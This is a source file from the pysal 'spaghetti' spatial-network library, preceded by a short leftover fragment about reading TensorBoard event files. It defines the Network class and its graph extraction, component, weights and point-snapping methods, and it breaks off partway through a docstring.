w.add_scalar("a", 5.0, 5)
w.add_scalar("a", 6.0, 6)
|
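The three writers above leave event files in nested run directories (foo, foo/bar, foo/bar/baz). A hedged sketch of reading them back with TensorBoard's event accumulator; the import path and tag name are assumptions based on the tensorboard package.

# Hypothetical read-back of the nested runs written above.
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator

for run in ("foo", "foo/bar", "foo/bar/baz"):
    acc = EventAccumulator(run)
    acc.Reload()
    print(run, [(s.step, s.value) for s in acc.Scalars("a")])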
spaghetti/network.py | gegen07/spaghetti | 182 | 16315 | <gh_stars>100-1000
from collections import defaultdict, OrderedDict
from itertools import islice
import copy, os, pickle, warnings
import esda
import numpy
from .analysis import GlobalAutoK
from . import util
from libpysal import cg, examples, weights
from libpysal.common import requires
try:
from libpysal import open
except ImportError:
import libpysal
open = libpysal.io.open
__all__ = ["Network", "PointPattern", "GlobalAutoK"]
SAME_SEGMENT = (-0.1, -0.1)
dep_msg = (
"The next major release of pysal/spaghetti (2.0.0) will "
"drop support for all ``libpysal.cg`` geometries. This change "
"is a first step in refactoring ``spaghetti`` that is "
"expected to result in dramatically reduced runtimes for "
"network instantiation and operations. Users currently "
"requiring network and point pattern input as ``libpysal.cg`` "
"geometries should prepare for this simply by converting "
"to ``shapely`` geometries."
)
warnings.warn(f"{dep_msg}", FutureWarning)
class Network:
"""Spatially-constrained network representation and analytical
functionality. Naming conventions are as follows, (1) arcs and
vertices for the full network object, and (2) edges and nodes for
the simplified graph-theoretic object. The term 'link' is used to
refer to a network arc or a graph edge.
Parameters
----------
in_data : {str, iterable (list, tuple, numpy.ndarray), libpysal.cg.Chain, geopandas.GeoDataFrame}
The input geographic data. Either (1) a path to a shapefile
(str); (2) an iterable containing ``libpysal.cg.Chain``
objects; (3) a single ``libpysal.cg.Chain``; or
(4) a ``geopandas.GeoDataFrame``.
vertex_sig : int
Round the x and y coordinates of all vertices to ``vertex_sig``
significant digits (combined significant digits on the left and
right of the decimal place). Default is 11. Set to ``None`` for
no rounding.
unique_arcs : bool
If ``True`` (default), keep only unique arcs (i.e., prune
out any duplicated arcs). If ``False`` keep all segments.
extractgraph : bool
If ``True``, extract a graph-theoretic object with no degree 2
nodes. Default is ``True``.
w_components : bool
Set to ``False`` to not record connected components from a
``libpysal.weights.W`` object. Default is ``True``.
weightings : {dict, bool}
If dict, lists of weightings for each arc. If bool,
``True`` flags ``self.arc_lengths`` as the weightings,
``False`` sets no weightings. Default is ``False``.
weights_kws : dict
Keyword arguments for ``libpysal.weights.W``.
vertex_atol : {int, None}
Precision for vertex absolute tolerance. Round vertex coordinates to
``vertex_atol`` decimal places. Default is ``None``. **ONLY** change
the default when there are known issues with digitization.
Attributes
----------
adjacencylist : list
List of lists storing vertex adjacency.
vertex_coords : dict
Keys are vertex IDs and values are :math:`(x,y)` coordinates of the vertices.
vertex_list : list
List of vertex IDs.
vertices : dict
Keys are tuples of vertex coords and values are the vertex ID.
arcs : list
List of arcs, where each arc is a sorted tuple
of vertex IDs.
arc_lengths : dict
Keys are tuples of sorted vertex IDs representing an arc and
values are the length.
pointpatterns : dict
Keys are a string name of the pattern and values are
``PointPattern`` class instances.
distance_matrix : numpy.ndarray
All network vertices (non-observations) distance matrix. Distances
between vertices in disparate components are recorded as ``inf``
by default.
network_trees : dict
Keys are the vertex IDs (``int``). Values are dictionaries
with the keys being the IDs of the destination vertex
and values being lists of vertices along the shortest path.
If the destination vertex is a) the origin or b)
unreachable (disparate component) it is listed as itself being the
neighbor.
edges : list
Tuples of graph edge IDs.
edge_lengths : dict
Keys are the graph edge IDs (``tuple``). Values are the
graph edge length (``float``).
non_articulation_points : list
All vertices with degree 2 that are not in an isolated
island ring (loop) component.
w_network : libpysal.weights.W
Weights object created from the network arcs.
network_n_components : int
Count of connected components in the network.
network_fully_connected : bool
``True`` if the network representation is a single connected
component, otherwise ``False``.
network_component_labels : numpy.ndarray
Component labels for network arcs.
network_component2arc : dict
Lookup in the form {int: list} for arcs comprising network
connected components keyed by component labels with arcs in
a list as values.
network_component_lengths : dict
Length of each network component (keyed by component label).
network_longest_component : int
The ID of the longest component in the network. This is not
necessarily equal to ``network_largest_component``.
network_component_vertices : dict
Lookup in the form {int: list} for vertices comprising network
connected components keyed by component labels with vertices in
a list as values.
network_component_vertex_count : dict
The number of vertices in each network component
(keyed by component label).
network_largest_component : int
The ID of the largest component in the network. Within ``spaghetti``
the largest component is the one with the most vertices. This is not
necessarily equal to ``network_longest_component``.
network_component_is_ring : dict
Lookup in the form {int: bool} keyed by component labels with values
as ``True`` if the component is a closed ring, otherwise ``False``.
w_graph : libpysal.weights.W
Weights object created from the graph edges.
graph_n_components : int
Count of connected components in the network.
graph_fully_connected : bool
``True`` if the graph representation is a single connected
component, otherwise ``False``.
graph_component_labels : numpy.ndarray
Component labels for graph edges.
graph_component2edge : dict
Lookup in the form {int: list} for edges comprising graph connected
components keyed by component labels with edges in a list
as values.
graph_component_lengths : dict
Length of each graph component (keyed by component label).
graph_longest_component : int
The ID of the longest component in the graph. This is not
necessarily equal to ``graph_largest_component``.
graph_component_vertices : dict
Lookup in the form {int: list} for vertices comprising graph
connected components keyed by component labels with vertices in
a list as values.
graph_component_vertex_count : dict
The number of vertices in each graph component
(keyed by component label).
graph_largest_component : int
The ID of the largest component in the graph. Within ``spaghetti``
the largest component is the one with the most vertices. This is not
necessarily equal to ``graph_longest_component``.
graph_component_is_ring : dict
Lookup in the form {int: bool} keyed by component labels with values as
``True`` if the component is a closed ring, otherwise ``False``.
Notes
-----
**Important**: The core procedure for generating network representations is
performed within the ``_extractnetwork()`` method. Here it is important to note
that a ``spaghetti.Network`` instance is built up from the individual,
constituent euclidean units of each line segment object. Therefore, the resulting
    network structure will generally have (1) more vertices and links than may be expected,
and, (2) many degree-2 vertices, which differs from a truly graph-theoretic object.
This is demonstrated in the
`Caveats Tutorial <https://pysal.org/spaghetti/notebooks/caveats.html#4.-Understanding-network-generation>`_.
See :cite:`Cliff1981`, :cite:`Tansel1983a`,
:cite:`AhujaRavindraK`, :cite:`Labbe1995`,
:cite:`Kuby2009`, :cite:`Barthelemy2011`,
:cite:`daskin2013`, :cite:`Okabe2012`,
:cite:`Ducruet2014`, :cite:`Weber2016`, for more in-depth discussion on
spatial networks, graph theory, and location along networks.
For related network-centric software see
`Snkit <https://github.com/tomalrussell/snkit>`_ :cite:`tom_russell_2019_3379659`,
`SANET <http://sanet.csis.u-tokyo.ac.jp>`_ :cite:`Okabe2006a`,
`NetworkX <https://networkx.github.io>`_ :cite:`Hagberg2008`,
`Pandana <http://udst.github.io/pandana/>`_ :cite:`Foti2012`,
and `OSMnx <https://osmnx.readthedocs.io/en/stable/>`_ :cite:`Boeing2017`.
Examples
--------
Create an instance of a network.
>>> import spaghetti
>>> from libpysal import examples
>>> streets_file = examples.get_path("streets.shp")
>>> ntw = spaghetti.Network(in_data=streets_file)
Fetch the number connected components in the network.
>>> ntw.network_n_components
1
Unique component labels in the network.
>>> import numpy
>>> list(numpy.unique(ntw.network_component_labels))
[0]
Show whether each component of the network is an isolated ring (or not).
>>> ntw.network_component_is_ring
{0: False}
Show how many network arcs are associated with the component.
>>> arcs = len(ntw.network_component2arc[ntw.network_component_labels[0]])
>>> arcs
303
Do the same as above, but for the graph-theoretic representation
of the network object.
>>> ntw.graph_n_components
1
>>> list(numpy.unique(ntw.graph_component_labels))
[0]
>>> ntw.graph_component_is_ring
{0: False}
>>> edges = len(ntw.graph_component2edge[ntw.graph_component_labels[0]])
>>> edges
179
The number of arcs in the network is always greater than or equal
to the number of edges in the graph-theoretic representation.
>>> arcs >= edges
True
Snap point observations to the network with attribute information.
>>> crimes_file = examples.get_path("crimes.shp")
>>> ntw.snapobservations(crimes_file, "crimes", attribute=True)
And without attribute information.
>>> schools_file = examples.get_path("schools.shp")
>>> ntw.snapobservations(schools_file, "schools", attribute=False)
Show the point patterns associated with the network.
>>> ntw.pointpatterns.keys()
dict_keys(['crimes', 'schools'])
"""
def __init__(
self,
in_data=None,
vertex_sig=11,
unique_arcs=True,
extractgraph=True,
w_components=True,
weightings=False,
weights_kws=dict(),
vertex_atol=None,
):
# do this when creating a clean network instance from a
# shapefile or a geopandas.GeoDataFrame, otherwise a shell
# network instance is created (see `split_arcs()` method)
if in_data is not None:
# set parameters as attributes
self.in_data = in_data
self.vertex_sig = vertex_sig
self.vertex_atol = vertex_atol
self.unique_arcs = unique_arcs
self.adjacencylist = defaultdict(list)
self.vertices = {}
# initialize network arcs and arc_lengths
self.arcs = []
self.arc_lengths = {}
# initialize pointpatterns
self.pointpatterns = {}
# spatial representation of the network
self._extractnetwork()
self.arcs = sorted(self.arcs)
self.vertex_coords = dict((v, k) for k, v in self.vertices.items())
# extract connected components
if w_components:
as_graph = False
network_weightings = False
if weightings == True:
# set network arc weights to length if weights are
# desired, but no other input in given
weightings = self.arc_lengths
network_weightings = True
# extract contiguity weights from libpysal
self.w_network = self.contiguityweights(
graph=as_graph,
weightings=weightings,
weights_kws=weights_kws,
)
# identify connected components from the `w_network`
self.identify_components(self.w_network, graph=as_graph)
# extract the graph -- repeat similar as above
# for extracting the network
if extractgraph:
self.extractgraph()
if w_components:
as_graph = True
if network_weightings:
weightings = self.edge_lengths
self.w_graph = self.contiguityweights(
graph=as_graph,
weightings=weightings,
weights_kws=weights_kws,
)
self.identify_components(self.w_graph, graph=as_graph)
# sorted list of vertex IDs
self.vertex_list = sorted(self.vertices.values())
def _round_sig(self, v):
"""Used internally to round the vertex to a set number of
        significant digits. If ``sig`` is set to 4, then the following
        are some possible results for a coordinate.
(1) 0.0xxxx, (2) 0.xxxx, (3) x.xxx, (4) xx.xx,
(5) xxx.x, (6) xxxx.0, (7) xxxx0.0
Parameters
----------
v : tuple
Coordinate (x,y) of the vertex.
"""
# set the number of significant digits
sig = self.vertex_sig
# simply return vertex (x,y) coordinates
if sig is None:
return v
# for each coordinate in a coordinate pair
# if the coordinate location is (0.0) simply return zero
# else -- (1) take the absolute value of `val`; (2) take the
# base 10 log for [1]; (3) take the floor of [2]; (4) convert
# [3] into a negative integer; (5) add `sig - 1` to [4];
# (6) round `val` by [5]
out_v = [
val
if val == 0
else round(val, -int(numpy.floor(numpy.log10(numpy.fabs(val)))) + (sig - 1))
for val in v
]
if self.vertex_atol:
out_v = [round(v, self.vertex_atol) for v in out_v]
return tuple(out_v)
def identify_components(self, w, graph=False):
"""Identify connected component information from a
``libpysal.weights.W`` object
Parameters
----------
w : libpysal.weights.W
Weights object created from the network segments (either
raw or graph-theoretic).
graph : bool
Flag for a raw network (``False``) or graph-theoretic network
(``True``). Default is ``False``.
"""
# flag network (arcs) or graph (edges)
if graph:
links = self.edges
obj_type = "graph_"
else:
links = self.arcs
obj_type = "network_"
# connected component count and labels
n_components = w.n_components
component_labels = w.component_labels
# is the network a single, fully-connected component?
if n_components == 1:
fully_connected = True
else:
fully_connected = False
# link to component lookup
link2component = dict(zip(links, component_labels))
# component ID lookups: links, lengths, vertices, vertex counts
component2link = {}
component_lengths = {}
component_vertices = {}
component_vertex_count = {}
cp_labs_ = set(w.component_labels)
l2c_ = link2component.items()
for cpl in cp_labs_:
component2link[cpl] = sorted([k for k, v in l2c_ if v == cpl])
c2l_ = component2link[cpl]
arclens_ = self.arc_lengths.items()
component_lengths[cpl] = sum([v for k, v in arclens_ if k in c2l_])
component_vertices[cpl] = list(set([v for l in c2l_ for v in l]))
component_vertex_count[cpl] = len(component_vertices[cpl])
# longest and largest components
longest_component = max(component_lengths, key=component_lengths.get)
largest_component = max(component_vertex_count, key=component_vertex_count.get)
# component to ring lookup
component_is_ring = {}
adj_ = self.adjacencylist.items()
for comp, verts in component_vertices.items():
component_is_ring[comp] = False
_2neighs = [len(neighs) == 2 for v, neighs in adj_ if v in verts]
if all(_2neighs):
component_is_ring[comp] = True
# attribute label name depends on object type
if graph:
c2l_attr_name = "component2edge"
else:
c2l_attr_name = "component2arc"
# set all new variables into list
extracted_attrs = [
["fully_connected", fully_connected],
["n_components", n_components],
["component_labels", component_labels],
[c2l_attr_name, component2link],
["component_lengths", component_lengths],
["component_vertices", component_vertices],
["component_vertex_count", component_vertex_count],
["longest_component", longest_component],
["largest_component", largest_component],
["component_is_ring", component_is_ring],
]
# iterate over list and set attribute with
# either "network" or "graph" extension
for (attr_str, attr) in extracted_attrs:
setattr(self, obj_type + attr_str, attr)
def _extractnetwork(self):
"""Used internally to extract a network."""
# initialize vertex count
vertex_count = 0
# determine input network data type
in_dtype = str(type(self.in_data)).split("'")[1]
is_libpysal_chains = False
supported_iterables = ["list", "tuple", "numpy.ndarray"]
# type error message
msg = "'%s' not supported for network instantiation."
# set appropriate geometries
if in_dtype == "str":
shps = open(self.in_data)
elif in_dtype in supported_iterables:
shps = self.in_data
shp_type = str(type(shps[0])).split("'")[1]
if shp_type == "libpysal.cg.shapes.Chain":
is_libpysal_chains = True
else:
raise TypeError(msg % shp_type)
elif in_dtype == "libpysal.cg.shapes.Chain":
shps = [self.in_data]
is_libpysal_chains = True
elif in_dtype == "geopandas.geodataframe.GeoDataFrame":
shps = self.in_data.geometry
else:
raise TypeError(msg % in_dtype)
# iterate over each record of the network lines
for shp in shps:
# if the segments are native pysal geometries
if is_libpysal_chains:
vertices = shp.vertices
else:
# fetch all vertices between euclidean segments
# in the line record -- these vertices are
# coordinates in an (x, y) tuple.
vertices = weights._contW_lists._get_verts(shp)
# iterate over each vertex (v)
for i, v in enumerate(vertices[:-1]):
# -- For vertex 1
# adjust precision -- this was originally
# implemented to handle high-precision
                # network vertices
v = self._round_sig(v)
# when the vertex already exists in lookup
# set it as the current `vid`
try:
vid = self.vertices[v]
# when the vertex is not present in the lookup
# add it and adjust vertex count
except KeyError:
self.vertices[v] = vid = vertex_count
vertex_count += 1
# -- For vertex 2
# repeat the steps above for vertex 1
v2 = self._round_sig(vertices[i + 1])
try:
nvid = self.vertices[v2]
except KeyError:
self.vertices[v2] = nvid = vertex_count
vertex_count += 1
# records vertex 1 and vertex 2 adjacency
self.adjacencylist[vid].append(nvid)
self.adjacencylist[nvid].append(vid)
# Sort the edges so that mono-directional
# keys can be stored.
arc_vertices = sorted([vid, nvid])
arc = tuple(arc_vertices)
# record the euclidean arc within the network
self.arcs.append(arc)
# record length
length = util.compute_length(v, vertices[i + 1])
self.arc_lengths[arc] = length
if self.unique_arcs:
# Remove duplicate edges and duplicate adjacent nodes.
self.arcs = list(set(self.arcs))
for k, v in self.adjacencylist.items():
self.adjacencylist[k] = list(set(v))
def extractgraph(self):
"""Using the existing network representation, create a
graph-theoretic representation by removing all vertices with a
neighbor incidence of two (non-articulation points). That is, we
assume these vertices are bridges between vertices with higher
or lower incidence.
"""
# initialize edges and edge_lengths
self.edges = []
self.edge_lengths = {}
# find all vertices with degree 2 that are not in an isolated
# island ring (loop) component. These are non-articulation
# points on the graph representation
non_articulation_points = self._yield_napts()
# retain non_articulation_points as an attribute
self.non_articulation_points = list(non_articulation_points)
# start with a copy of the spatial representation and
# iteratively remove edges deemed to be segments
self.edges = copy.deepcopy(self.arcs)
self.edge_lengths = copy.deepcopy(self.arc_lengths)
# mapping all the 'network arcs' contained within a single
# 'graph represented' edge
self.arcs_to_edges = {}
# build up bridges "rooted" on the initial
# non-articulation points
bridge_roots = []
# iterate over all vertices that are not contained within
# isolated loops that have a degree of 2
for s in non_articulation_points:
# initialize bridge with an articulation point
bridge = [s]
# fetch all vertices adjacent to point `s`
# that are also degree 2
neighbors = self._yieldneighbor(s, non_articulation_points, bridge)
while neighbors:
# extract the current node in `neighbors`
cnode = neighbors.pop()
# remove it from `non_articulation_points`
non_articulation_points.remove(cnode)
# add it to bridge
bridge.append(cnode)
# fetch neighbors for the current node
newneighbors = self._yieldneighbor(
cnode, non_articulation_points, bridge
)
# add the new neighbors back into `neighbors`
neighbors += newneighbors
# once all potential neighbors are exhausted add the
# current bridge of non-articulation points to the
# list of rooted bridges
bridge_roots.append(bridge)
# iterate over the list of newly created rooted bridges
for bridge in bridge_roots:
            # if there is only one non-articulation
            # point in the bridge
if len(bridge) == 1:
                # fetch the neighbors of the singular element of the bridge
n = self.adjacencylist[bridge[0]]
# and create a new graph edge from it
new_edge = tuple(sorted([n[0], n[1]]))
# identify the arcs to be removed
e1 = tuple(sorted([bridge[0], n[0]]))
e2 = tuple(sorted([bridge[0], n[1]]))
# remove the network arcs (spatial) from the
# graph-theoretic representation
self.edges.remove(e1)
self.edges.remove(e2)
# remove the former network arc lengths from the
# graph edge lengths lookup
length_e1 = self.edge_lengths[e1]
length_e2 = self.edge_lengths[e2]
self.edge_lengths.pop(e1, None)
self.edge_lengths.pop(e2, None)
# and add the new edge length in their place
self.edge_lengths[new_edge] = length_e1 + length_e2
# update the pointers
self.arcs_to_edges[e1] = new_edge
self.arcs_to_edges[e2] = new_edge
            # if there is more than one vertex in the bridge
else:
cumulative_length = 0
start_end = {}
# initialize a redundant set of bridge edges
redundant = set([])
# iterate over the current bridge
for b in bridge:
# iterate over each node in the bridge
for n in self.adjacencylist[b]:
# start the bridge with this node
if n not in bridge:
start_end[b] = n
# or create a redundant edge with the current
# node and `b`
else:
redundant.add(tuple(sorted([b, n])))
# initialize a new graph edge
new_edge = tuple(sorted(start_end.values()))
# add start_end redundant edge
for k, v in start_end.items():
redundant.add(tuple(sorted([k, v])))
# remove all redundant network arcs while
# adjusting the graph edge lengths lookup
# and the edges_to_arcs lookup
for r in redundant:
self.edges.remove(r)
cumulative_length += self.edge_lengths[r]
self.edge_lengths.pop(r, None)
self.arcs_to_edges[r] = new_edge
# finally, add the new cumulative edge length
self.edge_lengths[new_edge] = cumulative_length
# add the updated graph edge
self.edges.append(new_edge)
# converted the graph edges into a sorted set to prune out
# duplicate graph edges created during simplification
self.edges = sorted(set(self.edges))
def _yield_napts(self):
"""Find all nodes with degree 2 that are not in an isolated
island ring (loop) component. These are non-articulation
points on the graph representation.
Returns
-------
napts : list
Non-articulation points on a graph representation.
"""
# non-articulation points
napts = set()
# network vertices remaining to evaluate
unvisted = set(self.vertices.values())
while unvisted:
# iterate over each component
for component_id, ring in self.network_component_is_ring.items():
# evaluate for non-articulation points
napts, unvisted = self._evaluate_napts(
napts, unvisted, component_id, ring
)
# convert set of non-articulation points into list
napts = list(napts)
return napts
def _evaluate_napts(self, napts, unvisited, component_id, ring):
"""Evaluate one connected component in a network for
non-articulation points (``napts``) and return an updated set of
        ``napts`` and unvisited vertices.
Parameters
----------
napts : set
Non-articulation points (``napts``) in the network. The
``napts`` here do not include those within an isolated
loop island.
unvisited : set
Vertices left to evaluate in the network.
component_id : int
ID for the network connected component for the
current iteration of the algorithm.
ring : bool
Network component is isolated island loop ``True`` or
not ``False``.
Returns
-------
napts : set
Updated ``napts`` object.
unvisited : set
            Updated ``unvisited`` object.
"""
# iterate over each `edge` of the `component`
for component in self.network_component2arc[component_id]:
# each `component` has two vertices
for vertex in component:
# if `component` is not an isolated island
# and `vertex` has exactly 2 neighbors,
# add `vertex` to `napts`
if not ring:
if len(self.adjacencylist[vertex]) == 2:
napts.add(vertex)
# remove `vertex` from `unvisited` if
# it is still in the set else move along to
# the next iteration
try:
unvisited.remove(vertex)
except KeyError:
pass
return napts, unvisited
def _yieldneighbor(self, vtx, arc_vertices, bridge):
"""Used internally, this method traverses a bridge arc
to find the source and destination nodes.
Parameters
----------
vtx : int
The vertex ID.
arc_vertices : list
All non-articulation points (``napts``) in the network.
These are referred to as degree-2 vertices.
bridge : list
            Initial bridge list containing only ``vtx``.
Returns
-------
nodes : list
Vertices to keep (articulation points). These elements are
referred to as nodes.
"""
        # instantiate empty list to fill with network articulation
# points (nodes with a degree of 1 [endpoints] or greater
# than 2 [intersections])
nodes = []
# get all nodes adjacent to `vtx` that are not in the
# set of 'bridge' vertices
for i in self.adjacencylist[vtx]:
if i in arc_vertices and i not in bridge:
nodes.append(i)
return nodes
def contiguityweights(
self, graph=True, weightings=None, from_split=False, weights_kws=dict()
):
"""Create a contiguity-based ``libpysal.weights.W`` object.
Parameters
----------
graph : bool
Controls whether the ``libpysal.weights.W`` is generated
using the spatial representation (``False``) or the graph
representation (``True``). Default is ``True``.
weightings : {dict, None}
Dictionary of lists of weightings for each arc/edge. Default is ``None``.
from_split : bool
Flag for whether the method is being called from within
``split_arcs()`` (``True``) or not (``False``). Default is ``False``.
weights_kws : dict
Keyword arguments for ``libpysal.weights.W``.
Returns
-------
W : libpysal.weights.W
A ``W`` representing the binary adjacency of the network.
See also
--------
libpysal.weights.W
Examples
--------
Instantiate a network.
>>> import spaghetti
>>> from libpysal import examples
>>> import numpy
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Snap point observations to the network with attribute information.
>>> ntw.snapobservations(
... examples.get_path("crimes.shp"), "crimes", attribute=True
... )
Find counts per network arc.
>>> counts = ntw.count_per_link(
... ntw.pointpatterns["crimes"].obs_to_arc, graph=False
... )
>>> counts[(50, 165)]
4
Create a contiguity-based ``W`` object.
>>> w = ntw.contiguityweights(graph=False)
>>> w.n, w.n_components
(303, 1)
Notes
-----
See :cite:`pysal2007` for more details.
"""
# instantiate OrderedDict to record network link
# adjacency which will be keyed by the link ID (a tuple)
# with values being lists of tuples (contiguous links)
neighbors = OrderedDict()
# flag network (arcs) or graph (edges)
if graph:
links = self.edges
else:
links = self.arcs
# if weightings are desired instantiate a dictionary
        # otherwise ignore weightings
if weightings:
_weights = {}
else:
_weights = None
# iterate over all links until all possibilities
# for network link adjacency are exhausted
working = True
while working:
# for each network link (1)
for key in links:
# instantiate a slot in the OrderedDict
neighbors[key] = []
if weightings:
_weights[key] = []
# for each network link (2)
for neigh in links:
# skip if comparing link to itself
if key == neigh:
continue
# if link(1) and link(2) share any vertex
# update neighbors adjacency
if (
key[0] == neigh[0]
or key[0] == neigh[1]
or key[1] == neigh[0]
or key[1] == neigh[1]
):
neighbors[key].append(neigh)
# and add weights if desired
if weightings:
_weights[key].append(weightings[neigh])
# break condition
# -- everything is sorted, so we know when we have
# stepped beyond a possible neighbor
if key[1] > neigh[1]:
working = False
if len(links) == 1 or from_split:
working = False
# call libpysal for `W` instance
weights_kws["weights"] = _weights
w = weights.W(neighbors, **weights_kws)
return w
def distancebandweights(self, threshold, n_processes=1, gen_tree=False):
"""Create distance-based weights.
Parameters
----------
threshold : float
Distance threshold value.
n_processes : {int, str}
Specify the number of cores to utilize. Default is 1 core.
Use ``"all"`` to request all available cores.
Specify the exact number of cores with an integer.
gen_tree : bool
Rebuild shortest path with ``True``, or skip with ``False``.
Default is ``False``.
Returns
-------
w : libpysal.weights.W
A ``W`` object representing the binary adjacency of
the network.
Notes
-----
See :cite:`AnselinRey2014` and :cite:`rey_open_2015` for more details
regarding spatial weights.
See also
--------
libpysal.weights.W
Examples
--------
Instantiate an instance of a network.
>>> import spaghetti
>>> from libpysal import examples
>>> streets_file = examples.get_path("streets.shp")
>>> ntw = spaghetti.Network(in_data=streets_file)
Create a contiguity-based ``W`` object based on network distance, ``500``
`US feet in this case <https://github.com/pysal/libpysal/blob/master/libpysal/examples/geodanet/streets.prj>`_.
>>> w = ntw.distancebandweights(threshold=500)
Show the number of units in the ``W`` object.
>>> w.n
230
There are ``8`` units with ``3`` neighbors in the ``W`` object.
>>> w.histogram[-1]
(8, 3)
"""
        # if a vertex-to-vertex network distance matrix is
# not present in the `network.Network` object; calculate
# one at this point
if not hasattr(self, "distance_matrix"):
self.full_distance_matrix(n_processes, gen_tree=gen_tree)
# identify all network vertices which are within the
# `threshold` parameter
neighbor_query = numpy.where(self.distance_matrix < threshold)
# create an instance for recording neighbors which
# inserts a new key if not present in object
neighbors = defaultdict(list)
# iterate over neighbors within the `threshold`
# and record all network vertices as neighbors
# if the vertex is not being compared to itself
for i, n in enumerate(neighbor_query[0]):
neigh = neighbor_query[1][i]
if n != neigh:
neighbors[n].append(neigh)
# call libpysal for `W` instance
w = weights.W(neighbors)
return w
def snapobservations(self, in_data, name, idvariable=None, attribute=False):
"""Snap a point pattern shapefile to a network object. The
point pattern is stored in the ``network.pointpattern``
attribute of the network object.
Parameters
----------
in_data : {geopandas.GeoDataFrame, str}
The input geographic data. Either (1) a path to a
shapefile (str); or (2) a ``geopandas.GeoDataFrame``.
name : str
Name to be assigned to the point dataset.
idvariable : str
Column name to be used as the ID variable.
attribute : bool
Defines whether attributes should be extracted. ``True`` for
attribute extraction. ``False`` for no attribute extraction.
Default is ``False``.
Notes
-----
See :cite:`doi:10.1111/gean.12211` for a detailed discussion on
the modeling consequences of snapping points to spatial networks.
Examples
--------
Instantiate a network.
>>> import spaghetti
>>> from libpysal import examples
>>> streets_file = examples.get_path("streets.shp")
>>> ntw = spaghetti.Network(in_data=streets_file)
Snap observations to the network.
>>> pt_str = "crimes"
>>> in_data = examples.get_path(pt_str+".shp")
>>> ntw.snapobservations(in_data, pt_str, attribute=True)
Isolate the number of points in the dataset.
>>> ntw.pointpatterns[pt_str].npoints
287
"""
        # create attribute of `pointpattern` by instantiating a
# `network.PointPattern` class
self.pointpatterns[name] = PointPattern(
in_data=in_data, idvariable=idvariable, attribute=attribute
)
        # allocate the point observations to the network
self._snap_to_link(self.pointpatterns[name])
def compute_distance_to_vertices(self, x, y, arc):
"""Given an observation on a network arc, return the distance
        to the two vertices that bound that arc.
Parameters
----------
x : float
The x-coordinate of the snapped point.
y : float
The y-coordinate of the snapped point.
arc : tuple
The (vtx0, vtx1) representation of the network arc.
Returns
-------
d1 : float
The distance to vtx0. Always the vertex with the lesser ID.
d2 : float
The distance to vtx1. Always the vertex with the greater ID.
"""
# distance to vertex 1
d1 = util.compute_length((x, y), self.vertex_coords[arc[0]])
# distance to vertex 2
d2 = util.compute_length((x, y), self.vertex_coords[arc[1]])
return d1, d2
def compute_snap_dist(self, pattern, idx):
"""Given an observation snapped to a network arc, calculate the
distance from the original location to the snapped location.
Parameters
-----------
pattern : spaghetti.PointPattern
The point pattern object.
idx : int
The point ID.
Returns
-------
dist : float
The euclidean distance from original location to the snapped
location.
"""
# set of original (x,y) point coordinates
loc = pattern.points[idx]["coordinates"]
# set of snapped (x,y) point coordinate
snp = pattern.snapped_coordinates[idx]
# distance from the original location to
# the snapped location along the network
dist = util.compute_length(loc, snp)
return dist
def _snap_to_link(self, pointpattern):
"""Used internally to snap point observations to network arcs.
Parameters
-----------
pointpattern : spaghetti.PointPattern
The point pattern object.
Returns
-------
obs_to_arc : dict
Dictionary with arcs as keys and lists of points as values.
arc_to_obs : dict
Dictionary with point IDs as keys and arc tuples as values.
dist_to_vertex : dict
Dictionary with point IDs as keys and values as dictionaries
with keys for vertex IDs and values as distances from point
to vertex.
dist_snapped : dict
Dictionary with point IDs as keys and distance from point
            to the network arc to which it is snapped.
"""
# instantiate observations snapped coordinates lookup
pointpattern.snapped_coordinates = {}
# record throw-away arcs (pysal.cg.Chain) enumerator
arcs_ = []
# snapped(point)-to-arc lookup
s2a = {}
# iterate over network arc IDs
for arc in self.arcs:
# record the start and end of the arc
head = self.vertex_coords[arc[0]]
tail = self.vertex_coords[arc[1]]
# create a pysal.cg.Chain object of the arc
# and add it to the arcs enumerator
arcs_.append(util._chain_constr(None, [head, tail]))
# add the arc into the snapped(point)-to-arc lookup
s2a[(head, tail)] = arc
# instantiate crosswalks
points = {} # point ID to coordinates lookup
obs_to_arc = {} # observations to arcs lookup
dist_to_vertex = {} # distance to vertices lookup
dist_snapped = {} # snapped distance lookup
        # fetch and record point coordinates keyed by ID
for point_idx, point in pointpattern.points.items():
points[point_idx] = point["coordinates"]
# snap point observations to the network
snapped = util.snap_points_to_links(points, arcs_)
# record obs_to_arc, dist_to_vertex, and dist_snapped
# -- iterate over the snapped observation points
for point_idx, snap_info in snapped.items():
# fetch the x and y coordinate
x, y = snap_info[1].tolist()
# look up the arc from snapped(point)-to-arc
arc = s2a[tuple(snap_info[0])]
# add the arc key to observations to arcs lookup
if arc not in obs_to_arc:
obs_to_arc[arc] = {}
# add the (x,y) coordinates of the original observation
# point location to the observations to arcs lookup
obs_to_arc[arc][point_idx] = (x, y)
# add the (x,y) coordinates of the snapped observation
# point location to the snapped coordinates lookup
pointpattern.snapped_coordinates[point_idx] = (x, y)
# calculate the distance to the left and right vertex
# along the network link from the snapped point location
d1, d2 = self.compute_distance_to_vertices(x, y, arc)
# record the distances in the distance to vertices lookup
dist_to_vertex[point_idx] = {arc[0]: d1, arc[1]: d2}
# record the snapped distance
dist_snapped[point_idx] = self.compute_snap_dist(pointpattern, point_idx)
# instantiate observations to network vertex lookup
obs_to_vertex = defaultdict(list)
# iterate over the observations to arcs lookup
for k, v in obs_to_arc.items():
# record the left and right vertex ids
keys = v.keys()
obs_to_vertex[k[0]] = keys
obs_to_vertex[k[1]] = keys
# iterate over components and assign observations
component_to_obs = {}
for comp, _arcids in self.network_component2arc.items():
component_to_obs[comp] = []
for lk, odict in obs_to_arc.items():
if lk in _arcids:
component_to_obs[comp].extend(list(odict.keys()))
# set crosswalks as attributes of the `pointpattern` class
pointpattern.obs_to_arc = obs_to_arc
pointpattern.component_to_obs = component_to_obs
pointpattern.dist_to_vertex = dist_to_vertex
pointpattern.dist_snapped = dist_snapped
pointpattern.obs_to_vertex = list(obs_to_vertex)
def count_per_link(self, obs_on, graph=False):
"""Compute the counts per arc or edge (link).
Parameters
----------
obs_on : dict
Dictionary of observations on the network.
Either in the form ``{(<LINK>):{<POINT_ID>:(<COORDS>)}}``
or ``{<LINK>:[(<COORD>),(<COORD>)]}``.
graph : bool
Count observations on graph edges (``True``) or
network arcs (``False``). Default is ``False``.
Returns
-------
counts : dict
Counts per network link in the form ``{(<LINK>):<COUNT>}``.
Examples
--------
Note that this passes the ``obs_to_arc`` or ``obs_to_edge`` attribute
of a point pattern snapped to the network.
>>> import spaghetti
